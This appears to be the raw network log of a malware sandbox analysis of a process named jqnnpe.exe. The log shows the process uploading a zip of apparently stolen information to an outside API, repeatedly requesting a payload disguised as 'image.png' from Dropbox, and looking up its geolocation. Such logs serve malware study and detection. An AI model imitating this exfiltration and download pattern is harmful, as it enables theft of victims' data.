                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 61 34 66 34 35 38 65 62 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 31 33 34 33 34 39 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 84 3b e6 58 bb 28 fe 09 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74 78 74 01 00 10 00 9a 02 00 00 00 00 00 00 4e 01
                                                                                                                                                                                                                                Data Ascii: --------------------------8dc9ea4f458eb80Content-Disposition: form-data; name="document"; filename="C:\ProgramData\134349\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-;X(8Information.txtN
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 0b eb bf 19 42 d0 6d d1 f6 22 c5 a6 34 56 f2 dc 7c 5b 83 60 28 db 41 a1 4c 7b 91 31 f0 56 be e5 6d 1b 06 22 72 48 b9 0e 75 f6 09 9d d3 b7 52 dd 07 28 81 c6 7e 3d a6 19 ad 93 67 d7 17 96 90 18 51 ef 4d c7 5a 87 98 c6 01 dd 8c ec 7e 7b 27 fa be 5e 26 59 91 43 20 a6 b6 6d d4 65 91 55 37 92 f5 5f 1c b6 a3 4e d7 33 bd 0e fe 37 20 c3 a8 d9 bb 64 48 12 d1 81 72 a0 13 3e f6 4d 49 bc 63 db d6 d5 8a 6b e7 bc 5b 47 64 c6 21 1d c5 aa 76 2a f7 cb 38 63 0e 40 9a f6 f4 4a 59 99 d5 3d 3f 39 44 8f e7 33 c8 a3 99 9f 8d 70 39 65 03 7d ec 28 89 f1 9f ba c1 c6 f8 7e 5f d7 79 5e 15 99 6c 4e 50 de 01 4e 49 50 49 bb 63 b5 79 7f 49 84 7d 18 0d ab 48 8b 7b 06 85 bc e6 3e 88 5a 7b 79 6c e3 0a 18 05 33 80 22 53 ea 16 3c d3 b6 e9 c5 3f 70 5f c2 d5 07 de 69 37 6b 62 6a 5e 54 31 90 94
                                                                                                                                                                                                                                Data Ascii: Bm"4V|[`(AL{1Vm"rHuR(~=gQMZ~{'^&YC meU7_N37 dHr>MIck[Gd!v*8c@JY=?9D3p9e}(~_y^lNPNIPIcyI}H{>Z{yl3"S<?p_i7kbj^T1
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: ce 33 58 97 0e 1f 99 cd d8 3a 02 64 13 53 09 2d ce 42 84 d2 4e f3 d8 ea a8 4a 66 ed cb a9 c3 1a 80 a2 7c f4 70 1b d5 2d 03 15 07 97 d0 d3 c5 8e a9 0a ef 6e d7 8e ca 92 b2 11 dd 12 8f 47 33 09 f8 6b 5e ee 55 a7 e1 7b 16 a1 d5 b8 c4 65 e0 ac f1 3d 23 57 7b 98 48 ec 8b d5 c7 47 df 22 bd 2b a3 33 bd aa 53 9c df 50 8a 7d 86 74 06 a8 a8 03 53 ee 6b 56 ca 5e 79 c7 69 4b 99 da ab 9c 8c c0 0b bf 29 56 ec bb e5 d5 a1 09 23 58 3d 44 7b 88 cc 9d 0c 76 c6 56 cd 88 4d 6b fc 75 32 83 a4 c4 f7 2d 96 25 5a 18 94 cf d6 b9 e3 04 46 27 8c 42 f8 d2 d5 95 e0 72 6f 84 f1 de 42 19 00 3c cb 87 52 e3 65 01 1c 8d ff cf df a5 b4 10 ff 17 0a b0 0e bf 97 2a 89 cb e8 dd 63 d2 57 54 a5 49 0b 33 96 a5 8e f4 e0 3f 19 4d 31 93 e7 29 cf d4 5b dd 5a 4e 1e 19 9c 18 e2 74 aa 82 e2 33 85 23 ea
                                                                                                                                                                                                                                Data Ascii: 3X:dS-BNJf|p-nG3k^U{e=#W{HG"+3SP}tSkV^yiK)V#X=D{vVMku2-%ZF'BroB<Re*cWTI3?M1)[ZNt3#
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 08 98 cc 06 be d1 4c 7b b2 b6 39 9d b8 ea 60 2c ac 28 42 b1 e8 ef c3 b1 22 87 67 f1 98 eb c1 6e 08 59 a6 15 d9 83 69 75 70 a5 fb 62 c2 24 22 d2 9e f3 40 55 6f 3f 5c 10 9d dc 1d 01 91 78 cc 46 42 c2 0d 39 37 f8 de 83 80 b2 bf 23 6b 02 ed 1e 2d a5 90 0b c7 ac c8 9c 42 80 7b 47 b5 d2 02 31 5f 8f 6e 9e 8c a9 a6 bd e0 28 a4 1b ae 2f be f1 d6 e8 9f a2 7f 4a 5c 65 23 7e 94 d7 5a 55 b4 c4 a7 74 0e f7 50 76 df a8 f5 34 6c 91 ce b2 86 8b 0a e8 bf 07 a1 2e 82 66 93 04 a9 f4 24 ad aa ea c2 05 f1 09 96 0b d8 07 da 52 a1 6f 3a 34 af a2 9f bd 3b f5 1a 62 d7 ed 16 19 46 ad 93 fb dc 71 70 de 6b 9b 26 85 d8 98 9d 67 ce 96 f6 98 79 0b 3c 01 54 f7 aa ff da be 82 91 64 ff 88 db 9f fe 9e cc a7 e4 f5 b5 73 1d 24 3d 4c 2d 02 8f 6a 0c 6e cc d5 83 8a d0 ba 28 34 05 8f bb 17 c0 ac
                                                                                                                                                                                                                                Data Ascii: L{9`,(B"gnYiupb$"@Uo?\xFB97#k-B{G1_n(/J\e#~ZUtPv4l.f$Ro:4;bFqpk&gy<Tds$=L-jn(4
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 28 65 13 fa 86 e1 84 83 73 7a 12 c8 4a 8a 25 d3 ea 89 49 e9 92 7d 55 1c cd 8d 86 18 3e d1 84 4b 18 a6 d7 4f 4e 2c 38 12 4e a3 b6 28 a6 22 d3 28 e3 9b 81 05 3d fd e0 40 46 fa bc 15 6f 50 39 9a c8 8b 1d 41 1f f2 e3 f3 33 e5 66 d6 aa ac 6f 45 c0 f5 e2 65 a3 4e d5 58 5b 90 3e e4 a7 e4 39 ee be a7 df 61 44 42 57 1f 1e fa d3 12 0d ab e6 d6 f6 59 58 e6 d6 5b 3e a0 ec 94 e4 e5 e8 fc e2 5b 50 87 5b a1 2c 26 41 62 7b 74 4f 85 f2 11 74 33 5e 0e 58 37 1a 43 62 4b 46 5c 25 53 36 00 ac ec 35 9e 18 e6 2b 27 9c 5b 17 f2 be 7b 4e 90 40 57 c8 51 b4 90 41 c3 f7 8c 02 4d 34 d6 5c bf 63 2c 37 5f 65 01 56 41 5d cf a6 49 f3 e8 b0 38 88 12 01 30 1d 03 5e 3b ec 8e 3e e1 9c e6 cc 04 9a dd 62 77 dd eb 7b 84 5e c4 6f b4 f7 28 9c 87 82 c6 c6 7a 0c 10 ca 08 68 35 74 be ad 31 0a 26 aa
                                                                                                                                                                                                                                Data Ascii: (eszJ%I}U>KON,8N("(=@FoP9A3foEeNX[>9aDBWYX[>[P[,&Ab{tOt3^X7CbKF\%S65+'[{N@WQAM4\c,7_eVA]I80^;>bw{^o(zh5t1&
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 68 ee d9 6e ea 82 8b ac 7d 1a fd c0 c6 4e 5e fc 93 72 47 c1 1a b7 3f c5 46 81 9b 03 8c 35 90 bf 77 33 52 99 10 82 49 4c c1 1b 4b 21 4c 21 1e 3c 5b 9b 3d 45 52 51 13 73 84 85 59 fd be f8 bd 37 eb d3 b3 77 b0 17 12 04 f4 b6 32 68 c0 ee c7 09 88 98 62 84 9e 34 9c 43 6e 5f fe be b8 4c c7 33 50 ac f1 d2 16 c8 5c 09 e1 91 28 6b de 39 17 49 62 fd 0c a9 6d 21 a7 df 49 a0 80 83 6d 55 40 37 4d 98 f9 12 56 9f f8 b0 86 aa 42 fe fa 8d 83 25 65 e9 1a b5 f1 e7 53 73 58 8e f9 20 1d 51 ea 19 e9 ae 7f 77 0e f0 01 1d ff 66 82 5e c8 5a d2 10 ca 8d 3c f0 68 7e 78 ed 20 37 8c 7e 65 57 4a 17 62 f5 10 0d e2 cc 26 5c c7 5b 6e 7c 0c 97 46 8c c6 37 cf 23 cd e5 e1 d5 32 3d 45 c4 c2 02 d2 5a 55 f5 0f 38 ac 1e 62 19 1d 6e 1d 99 5c 5f 20 92 48 8f da 4f bf 08 d5 08 64 17 26 ee 7f 49 8b
                                                                                                                                                                                                                                Data Ascii: hn}N^rG?F5w3RILK!L!<[=ERQsY7w2hb4Cn_L3P\(k9Ibm!ImU@7MVB%eSsX Qwf^Z<h~x 7~eWJb&\[n|F7#2=EZU8bn\_ HOd&I
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: ff 4f a0 7c 92 00 77 87 b8 f5 91 17 00 e6 12 32 be 9d f2 eb a2 07 3a 88 17 f6 28 7a 6c 49 47 59 77 f1 15 a5 f6 8d da 76 1d 5c a2 94 68 32 68 25 61 ae 2f 59 8d f1 33 63 2d 1c 43 44 9c 1e 13 f0 7d 9a 47 0c 2d e5 67 7b 93 e8 37 e5 32 e0 11 2a 9b c6 05 5b 7a 21 88 d8 df 1d da eb 45 f7 f1 8f ac 09 9d 39 ba 61 f8 27 cf 22 41 88 d8 fd c9 e5 23 79 e7 e8 34 ec 86 f9 9d 96 94 79 65 c4 ec 95 cc 2d 1b 23 51 86 ef b6 3f e8 61 11 a1 99 11 59 f8 10 f3 54 0a 73 fa 05 21 b9 1c 16 8a 5f 29 86 26 9c 34 72 65 6c 4f e9 fb c7 82 86 ae 46 31 55 09 08 9f 92 d4 56 9c 30 f1 50 49 49 a2 d5 27 30 d1 96 48 c7 88 8b 7c 62 77 7f ae db a6 c9 ef 47 2e a0 0e ed 18 c7 a4 86 0b 81 b2 88 7b 9a 40 22 1e 63 35 32 51 3d bf fa e7 af a9 e6 9d 4a 94 91 30 78 a9 70 de cb fd 82 4b 0b ef ac a1 62 c3
                                                                                                                                                                                                                                Data Ascii: O|w2:(zlIGYwv\h2h%a/Y3c-CD}G-g{72*[z!E9a'"A#y4ye-#Q?aYTs!_)&4relOF1UV0PII'0H|bwG.{@"c52Q=J0xpKb
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: ff 95 a4 c7 0c de 0a f3 30 9c 57 87 11 6c 8d 69 12 42 a8 31 26 2e b8 a1 89 8f 72 28 e0 9e 60 59 a5 4c 67 3b 09 a1 fa 05 56 40 be bf ac 10 4b 35 bf c9 b5 f2 80 04 64 c1 9e e0 3e 80 04 4a ec 86 04 71 6d 10 55 05 56 e9 92 a6 4b a1 5c 77 26 71 b9 bb 77 86 f4 76 39 23 9a bd 13 c0 51 29 6b 32 d7 45 47 df 9e 72 3a 27 7d cd 7d 02 33 93 b4 21 24 e0 d0 67 c5 4a 06 c6 65 f2 1a 1c 06 57 77 fb d3 11 b1 54 7d b6 d5 e5 40 b3 cb 59 e9 7e 5e d2 02 e3 c3 25 a8 81 2e 5a ed 96 a4 bf 80 6e 41 33 b6 7f 6f 0d af 8c d3 7b c3 fc 99 f4 04 97 b8 f4 08 d2 d1 5e 90 34 b7 b6 21 41 f7 af b0 ca c5 30 ea 46 e8 f6 ba a8 c3 56 47 03 5d 0d 11 6f 5e 51 2e 55 68 be cb b9 cc 2e e4 d7 6b da ea ad 2d f8 f1 ed a4 c1 3b 7d 80 b1 91 bf 70 f3 b6 15 77 89 c5 29 db 8d 7a 8c ae ef 1d 5e 1a 1e 83 36 d3
                                                                                                                                                                                                                                Data Ascii: 0WliB1&.r(`YLg;V@K5d>JqmUVK\w&qwv9#Q)k2EGr:'}}3!$gJeWwT}@Y~^%.ZnA3o{^4!A0FVG]o^Q.Uh.k-;}pw)z^6
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: f4 23 0f ee 57 f6 9b 98 a0 fa 3a c8 05 bd 3c 03 74 90 62 de cc 1e 08 84 d8 ab 14 3f 82 34 de f9 e6 a1 d1 59 c9 dc f1 4b 66 ec e6 dd 7e 54 f8 ba 4e bd 1d b4 93 95 67 76 a7 d4 21 f7 51 ea b2 56 c2 f1 f3 55 1a fd a3 f4 61 7a 9d e2 9b 31 8f 8b e2 7b f0 38 8d d8 72 f9 1b b7 b0 e7 b5 da 6d 03 3d 10 ec e7 17 14 ce 80 c5 2a 65 40 d8 b3 a0 34 24 74 1d 30 9b ad eb b2 c8 dc 11 d9 1d fc 32 cd 01 dc a1 d0 b6 e5 2f ef a0 cf 91 6b ec 78 ee 39 ec 4c 56 f8 fd 6d 2d ee 05 97 5e ae 52 cb 78 7f 4f d7 ae 48 fb 20 3b 70 45 55 42 15 cb 15 8c 81 a6 78 cb ad b2 df f4 a7 b5 bd b3 c9 81 7f 0b 32 92 fb 59 87 de c3 ce 68 e5 81 c2 94 cd 09 76 de e6 2f 31 5a 41 a8 b9 48 ee 4e ea b9 fc ff 0b 50 b0 8d 1b a9 17 7f ce 6f b8 cd ba 91 60 1e 65 f2 d4 88 32 a7 15 e7 dd 22 91 c0 e6 19 99 76 58
                                                                                                                                                                                                                                Data Ascii: #W:<tb?4YKf~TNgv!QVUaz1{8rm=*e@4$t02/kx9LVm-^RxOH ;pEUBx2Yhv/1ZAHNPo`e2"vX
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC16355OUTData Raw: 5f c6 ca 0f 15 b4 ce 96 25 5e 5f 0c f9 6a e3 fa 05 cf ec 90 0b af e9 5c ba 08 dd 4c cf 07 05 49 d5 5b 8c 43 1c 9e 56 49 e9 7f 89 ca a4 81 12 89 e2 7a eb b8 05 7f c1 ce 8a 39 0f 97 3c f3 84 ad f2 1f aa cc 52 5e 2f 7f 10 a7 b6 5c a6 e6 28 88 3d 1d 34 a2 4d df 63 06 72 f1 f0 cc ac de 0d 53 89 2c 4a e3 9c d6 1a 20 a0 d5 43 95 5e 62 73 7d 2c 79 a3 0f fa 58 ae 53 f2 f7 1a db 8b 21 31 b8 71 a6 93 62 7b ff 94 9b f3 d8 1f 16 c0 04 e8 fb 77 d7 ae bf ee 8f e6 1d a9 27 70 59 21 9f 52 85 06 72 6f 48 1e a7 80 77 05 17 d7 fa 09 7e 0b d6 4b 2c 6b 15 30 26 0e ca 73 4c 94 f8 c8 b8 89 21 77 fe 2f 85 56 80 52 81 c1 a6 b5 19 56 99 d6 a3 8a 97 55 ae fc 48 0d d5 79 7a a0 4d 74 32 c8 5e f2 92 31 8f 48 71 2d a5 96 76 26 aa 9d f7 70 d8 60 bc 4b e9 7d 92 08 ec 83 1a 6a 9d 38 ce 07
                                                                                                                                                                                                                                Data Ascii: _%^_j\LI[CVIz9<R^/\(=4McrS,J C^bs},yXS!1qb{w'pY!RroHw~K,k0&sL!w/VRVUHyzMt2^1Hq-v&p`K}j8
                                                                                                                                                                                                                                2024-07-06 11:28:17 UTC405INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:17 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 58
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.449858162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC107OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:28 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: 4940563c263a4ed3b37c3a86e8dbeffc
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.449857188.114.96.34435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC67OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                Host: freegeoip.app
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC645INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:28 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                Expires: Sat, 06 Jul 2024 12:28:28 GMT
                                                                                                                                                                                                                                Location: https://ipbase.com/xml/
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BIxHCCRsryuVWR2DI8aqY%2FDz3uID2mS8hANzEXB5xfj0blGRiEJ%2BHF02hoZxxZPcdMe1LbdJcJd5rSbLkr%2BEOYAxcgPBJLHsBCvVET4%2Bv%2BDolMIqbE2ojqF3yoaUEiD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef406199238ca2-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.449859162.125.66.154435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC107OUTGET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1
                                                                                                                                                                                                                                Host: dl.dropboxusercontent.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC441INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Security-Policy: sandbox allow-forms allow-scripts
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:28 GMT
                                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                                Content-Length: 925
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                X-Dropbox-Request-Id: e52878a685204f45bccfbb878255493b
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC925INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.449861172.67.209.714435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:28 UTC64OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                Host: ipbase.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC731INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:29 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Age: 50755
                                                                                                                                                                                                                                Cache-Control: public,max-age=0,must-revalidate
                                                                                                                                                                                                                                Cache-Status: "Netlify Edge"; hit
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Nf-Request-Id: 01J23WTYW1WES339EJ18E99HNP
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDDK09sas0hEkzBID3%2BV004n7lwwGklSht2LAABLcpqI30Ljl5Xa4KTbAnhKSReO9QOw7cF96foreNRVbTWde7QfcCUmLDeDvDnByblnH8hswsz2snMBnM4Gnyko"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef406588498cc0-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC638INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                                                                                                                                                                                                                Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                                                                                                                                                                                                                2024-07-06 11:28:29 UTC1369INData Raw: 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68
                                                                                                                                                                                                                                Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh
